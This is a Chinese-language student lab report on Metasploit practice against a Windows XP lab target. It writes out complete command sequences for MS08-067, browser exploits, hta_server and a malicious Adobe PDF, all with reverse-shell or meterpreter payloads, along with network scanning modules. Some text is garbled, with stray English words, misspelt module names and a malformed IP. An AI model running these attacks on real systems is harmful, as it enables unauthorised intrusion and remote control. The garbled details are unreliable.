本实践目标是掌握metasploit的基本应用方式,重点经常使用的三种攻击方式的思路。具体须要完成:shell
一个主动攻击实践:MS08-067(成功)windows
一个针对浏览器的攻击:MS10_002_aurora(失败)、browser_autpwn2(成功)、vm_1漏洞系统BodgeIt(成功且惟一)api
一个针对客户端的攻击:adobe_toolbutton(成功)浏览器
一个辅助模块:http_vertion(成功且惟一)、ssh_vertion(成功且惟一)、arp_sweep(成功)安全
用本身的话解释什么是exploit,payload,encode网络
exploit:MSF的攻击模块,它的功能是将payload(有效攻击载荷)顺利传送到靶机中,分为主动攻击和被动攻击两种模式。ssh
payload:有效攻击载荷,在靶机中实际执行的一段恶意代码,做用通常是执行后能与攻击的主机创建链接,实现远程控制。tcp
encode:编码模块,可以经过不一样的编码方式对payload进行不一样的编码,仅改变payload的一些“”
外貌特征,不影响其功能学习
采用的靶机为:Windows XP SP3编码
首先使用nmap -sS -A --script=smb-vuln-ms08-067 -PO 靶机IP地址
查看靶机是否存在该漏洞
而后在攻击机Kali的命令行中输入msfconsole
进入控制台
选择ms08-067漏洞 use exploit/windows/smb/ms08_067_netapi
使用show options
查看须要设置的相关参数
设置靶机的IP set RHOSTS 192.168.1.235
选择有关tcp的反向链接的payload generic/shell_reverse_tcp
设置监听者的IPset LHOST 192.168.1.123
设置监听的端口号set LPORT 5320
。
执行攻击 exploit
按照上个漏洞攻击一样的步骤,设置相关参数:
msfconsole use exploit/windows/browser/ms10_002_aurora set payload generic/shell_reverse_tcp set LHOST 192.168.1.123 //设置kali攻击IP, set RHOST 192.168.1.235 set SRVPORT 5320
查看相关配置,确认有无差错
执行exploit
,生成一些URL连接
在靶机IE输入刚刚生成的URL连接,结果出现错误
Kali端链接中断,攻击失败
猜想是浏览器在访问过程当中发生了一些错误,中断了回连的过程,应该是浏览器的安全设置问题。
而后尝试第二次攻击:
use auxiliary/server/browser_autopwn2 set SRVHOST 192.168.56.1 set URIPATH /test
exploit
使目标浏览器访问http://192.168.1.123/test
Kali虚拟机显示攻击成功。
第三次攻击,惟一(vm_1漏洞系统BodgeIt)
use exploit/windows/misc/hta_server set payload windows/shell/reverse_tcp set srvport 8888 set lport 12345 run
如今切换到Windows虚拟机,打开IE浏览器,输入地址
点击运行,回连成功
进入msf模块,使用adobe_toolbutton进行攻击,设置相关参数
输入如下命令,完成配置并建立PDF,打开显示隐藏文件,并在/root/.msf4/local/目录下找到20165320.pdf文件,以下图所示
use exploit/windows/fileformat/adobe_toolbutton//使用Adobe_toolbutton模块 set payload windows/meterpreter/reverse_tcp set LHOST 192.168.1.123 //设置kali攻击IP, set LPORT 5320 set FILENAME 20165320.pdf
将该PDF拷到靶机上
以后进入以前的监听模块,依次输入如下命令设置并监听便可,输入exploit后在靶机上打开pdf,回连成功
use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set LHOST 192.168.1.123 set LPORT 5320 exploit
使用http_vertion模块可以扫描靶机的http版本号
use auxiliary/scanner/http/http_vertion set RHOST 192.168.1.157 set THREADS 10 set RPORT 80 exploit
使用ssh_vertion模块可以扫描靶机的ssh版本号
use auxiliary/scanner/ssh/ssh_vertion set RHOST 192.1.235 set THREADS 10 set RPORT 80 exploit
使用arp_sweep 扫描网段的主机
use auxiliary/scanner/discovery/arp_sweep set RHOSTS 192.168.1.0/24 set THREADS 50 exploit
这一次实验咱们熟悉了MSF的六大模块,也弄清楚了它们具体的用法,为咱们之后的学习打下了必定的基础,可是也发现了许多操做系统已经修补了之前存在的漏洞,对于咱们这样的新手来讲,找到一个新的漏洞太难。